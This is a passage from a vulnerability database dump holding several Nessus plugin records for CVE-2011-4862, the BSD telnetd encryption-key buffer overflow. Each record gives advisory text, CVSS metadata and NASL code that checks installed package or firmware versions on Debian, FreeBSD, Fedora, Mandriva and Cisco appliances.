descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2375. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57515);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-4862\");\n script_xref(name:\"DSA\", value:\"2375\");\n\n script_name(english:\"Debian DSA-2375-1 : krb5, krb5-appl - buffer overflow\");\n script_summary(english:\"Checks dpkg output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that the encryption support for BSD telnetd contains\na pre-authentication buffer overflow, which may enable remote\nattackers who can connect to the Telnet port to execute arbitrary code\nwith root privileges.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/krb5-appl\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2011/dsa-2375\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the krb5 and krb5-appl packages.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.6.dfsg.4~beta1-5lenny7 of krb5.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1:1.0.1-1.2 of krb5-appl.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-760\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:krb5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:krb5-appl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:5.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/01/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"5.0\", prefix:\"krb5\", reference:\"1.6.dfsg.4~beta1-5lenny7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"krb5-clients\", reference:\"1:1.0.1-1.2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"krb5-ftpd\", reference:\"1:1.0.1-1.2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"krb5-rsh-server\", reference:\"1:1.0.1-1.2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"krb5-telnetd\", reference:\"1:1.0.1-1.2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:43:19", "description": "The MIT Kerberos Team reports :\n\nWhen an encryption key is supplied via the TELNET protocol, its length\nis not validated before the key is copied into a fixed-size buffer.\nAlso see MITKRB5-SA-2011-008.", "edition": 27, "published": "2011-12-27T00:00:00", "title": "FreeBSD : krb5-appl -- telnetd code execution vulnerability (4ddc78dc-300a-11e1-a2aa-0016ce01e285)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4862"], "modified": "2011-12-27T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:krb5-appl"], "id": "FREEBSD_PKG_4DDC78DC300A11E1A2AA0016CE01E285.NASL", "href": "https://www.tenable.com/plugins/nessus/57403", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57403);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2011-4862\");\n script_bugtraq_id(51182);\n script_xref(name:\"FreeBSD\", value:\"SA-11:08.telnetd\");\n\n script_name(english:\"FreeBSD : krb5-appl -- telnetd code execution vulnerability (4ddc78dc-300a-11e1-a2aa-0016ce01e285)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The MIT Kerberos Team reports :\n\nWhen an encryption key is supplied via the TELNET protocol, its length\nis not validated before the key is copied into a fixed-size buffer.\nAlso see MITKRB5-SA-2011-008.\"\n );\n # http://security.FreeBSD.org/advisories/FreeBSD-SA-11:08.telnetd.asc\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?bcb80033\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2011-008.txt\"\n );\n # https://vuxml.freebsd.org/freebsd/4ddc78dc-300a-11e1-a2aa-0016ce01e285.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f6a55198\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-760\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:krb5-appl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/12/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/12/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"krb5-appl<1.0.2_1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:09:24", "description": "This update incorporates the upstream patch to fix a buffer overflow\nin the Kerberos-aware telnet server.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2012-01-06T00:00:00", "title": "Fedora 16 : krb5-appl-1.0.2-2.fc16 (2011-17493)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4862"], "modified": "2012-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:krb5-appl", "cpe:/o:fedoraproject:fedora:16"], "id": "FEDORA_2011-17493.NASL", "href": "https://www.tenable.com/plugins/nessus/57443", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-17493.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57443);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-4862\");\n script_bugtraq_id(51182);\n script_xref(name:\"FEDORA\", value:\"2011-17493\");\n\n script_name(english:\"Fedora 16 : krb5-appl-1.0.2-2.fc16 (2011-17493)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update incorporates the upstream patch to fix a buffer overflow\nin the Kerberos-aware telnet server.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=770325\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-January/071640.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d9b696d1\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected krb5-appl package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-760\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:krb5-appl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:16\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/01/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^16([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 16.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC16\", reference:\"krb5-appl-1.0.2-2.fc16\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"krb5-appl\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T01:32:24", "description": "According to its self-reported version, the version of AsyncOS running\non the remote Cisco Email Security Appliance (ESA) is affected by a\nremote code execution vulnerability due to a buffer overflow condition\nin the telnet component.", "edition": 29, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2014-11-17T00:00:00", "title": "Cisco Email Security Appliance Telnet Remote Code Execution (cisco-sa-20120126-ironport)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4862"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:cisco:email_security_appliance_firmware", "cpe:/o:cisco:asyncos", "cpe:/h:cisco:email_security_appliance"], "id": "CISCO-SA-20120126-ESA.NASL", "href": "https://www.tenable.com/plugins/nessus/79271", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(79271);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\"CVE-2011-4862\");\n script_bugtraq_id(51182);\n script_xref(name:\"EDB-ID\", value:\"18280\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCzv32432\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20120126-ironport\");\n\n script_name(english:\"Cisco Email Security Appliance Telnet Remote Code Execution (cisco-sa-20120126-ironport)\");\n script_summary(english:\"Checks the ESA version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote security appliance is missing a vendor-supplied security\npatch.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the version of AsyncOS running\non the remote Cisco Email Security Appliance (ESA) is affected by a\nremote code execution vulnerability due to a buffer overflow condition\nin the telnet component.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120126-ironport\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a6a6592a\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.cisco.com/bugsearch/bug/CSCzv32432\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.freebsd.org/security/advisories/FreeBSD-SA-11:08.telnetd.asc\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant update referenced in Cisco Security Advisory\ncisco-sa-20120126-ironport.\n\nAlternatively, as a workaround, the vendor notes that Telnet services\ncan be disabled on the device.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-760\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/12/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:cisco:email_security_appliance\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:cisco:asyncos\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:cisco:email_security_appliance_firmware\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_esa_version.nasl\");\n script_require_keys(\"Host/AsyncOS/Cisco Email Security Appliance/DisplayVersion\", \"Host/AsyncOS/Cisco Email Security Appliance/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\ndisplay_ver = get_kb_item_or_exit('Host/AsyncOS/Cisco Email Security Appliance/DisplayVersion');\nver = get_kb_item_or_exit('Host/AsyncOS/Cisco Email Security Appliance/Version');\n\n# If not paranoid, check if telnet is detected first.\n# get_service() may fork; don't use.\nif (report_paranoia < 2) get_kb_list_or_exit(\"Services/telnet\");\n\n# Affected/Fixed Cisco AsyncOS Software for Cisco ESA :\n# 7.1 and prior - 7.1.5-101\n# 7.3 - 7.3.1-101\n# 7.5 - 7.5.1-102\n# 7.6 - 7.6.1-022\n# 8.0 - Not Affected\n# 8.5 - Not Affected\n# 8.6 - Not Affected\nif (ver =~ \"^[0-6]\\.\" || ver =~ \"^7\\.[01]\\.\")\n display_fix = '7.1.5-101';\nelse if (ver =~ \"^7\\.3\\.\")\n display_fix = '7.3.1-101';\nelse if (ver =~ \"^7\\.5\\.\")\n display_fix = '7.5.1-102';\nelse if (ver =~ \"^7\\.6\\.\")\n display_fix = '7.6.1-022';\nelse\n audit(AUDIT_INST_VER_NOT_VULN, 'Cisco ESA', display_ver);\n\nfix = str_replace(string:display_fix, find:'-', replace:'.');\n\nif (ver_compare(ver:ver, fix:fix, strict:FALSE) >= 0) audit(AUDIT_INST_VER_NOT_VULN, 'Cisco ESA', display_ver);\n\nif (report_verbosity > 0)\n{\n report =\n '\\n Installed version : ' + display_ver +\n '\\n Fixed version : ' + display_fix + \n '\\n';\n security_hole(port:0, extra:report);\n}\nelse security_hole(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T11:53:33", "description": "A vulnerability has been discovered and corrected in krb5-appl,\nheimdal and netkit-telnet :\n\nAn unauthenticated remote attacker can cause a buffer overflow and\nprobably execute arbitrary code with the privileges of the telnet\ndaemon (CVE-2011-4862).\n\nIn Mandriva the telnetd daemon from the netkit-telnet-server package\ndoes not have an initscript to start and stop the service, however one\ncould rather easily craft an initscript or start the service by other\nmeans rendering the system vulnerable to this issue.\n\nThe updated packages have been patched to correct this issue.", "edition": 25, "published": "2011-12-29T00:00:00", "title": "Mandriva Linux Security Advisory : krb5-appl (MDVSA-2011:195)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4862"], "modified": "2011-12-29T00:00:00", "cpe": ["cpe:/o:mandriva:linux:2011", "p-cpe:/a:mandriva:linux:krb5-appl-clients", "cpe:/o:mandriva:linux:2010.1", "p-cpe:/a:mandriva:linux:netkit-telnet-server", "p-cpe:/a:mandriva:linux:krb5-appl-servers", "p-cpe:/a:mandriva:linux:netkit-telnet"], "id": "MANDRIVA_MDVSA-2011-195.NASL", "href": "https://www.tenable.com/plugins/nessus/57412", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2011:195. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57412);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2011-4862\");\n script_xref(name:\"MDVSA\", value:\"2011:195\");\n\n script_name(english:\"Mandriva Linux Security Advisory : krb5-appl (MDVSA-2011:195)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability has been discovered and corrected in krb5-appl,\nheimdal and netkit-telnet :\n\nAn unauthenticated remote attacker can cause a buffer overflow and\nprobably execute arbitrary code with the privileges of the telnet\ndaemon (CVE-2011-4862).\n\nIn Mandriva the telnetd daemon from the netkit-telnet-server package\ndoes not have an initscript to start and stop the service, however one\ncould rather easily craft an initscript or start the service by other\nmeans rendering the system vulnerable to this issue.\n\nThe updated packages have been patched to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2011-008.txt\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-760\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:krb5-appl-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:krb5-appl-servers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:netkit-telnet\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:netkit-telnet-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2010.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2011\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/12/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2010.1\", reference:\"krb5-appl-clients-1.0-4.2mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"krb5-appl-servers-1.0-4.2mdv2010.2\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2011\", reference:\"krb5-appl-clients-1.0.2-1.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"krb5-appl-servers-1.0.2-1.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"netkit-telnet-0.17-12.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"netkit-telnet-server-0.17-12.1-mdv2011.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T01:32:24", "description": "According to its self-reported version, the version of AsyncOS running\non the remote Cisco Content Security Management Appliance (SMA) is\naffected by a remote code execution vulnerability due to a buffer\noverflow condition in the telnet component.", "edition": 26, "published": "2014-11-17T00:00:00", "title": "Cisco Content Security Management Appliance Telnet Remote Code Execution (cisco-sa-20120126-ironport)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4862"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/h:cisco:content_security_management_appliance", "cpe:/o:cisco:asyncos"], "id": "CISCO-SA-20120126-SMA.NASL", "href": "https://www.tenable.com/plugins/nessus/79272", "sourceData": "#\n# (C) Tenable Network Security, 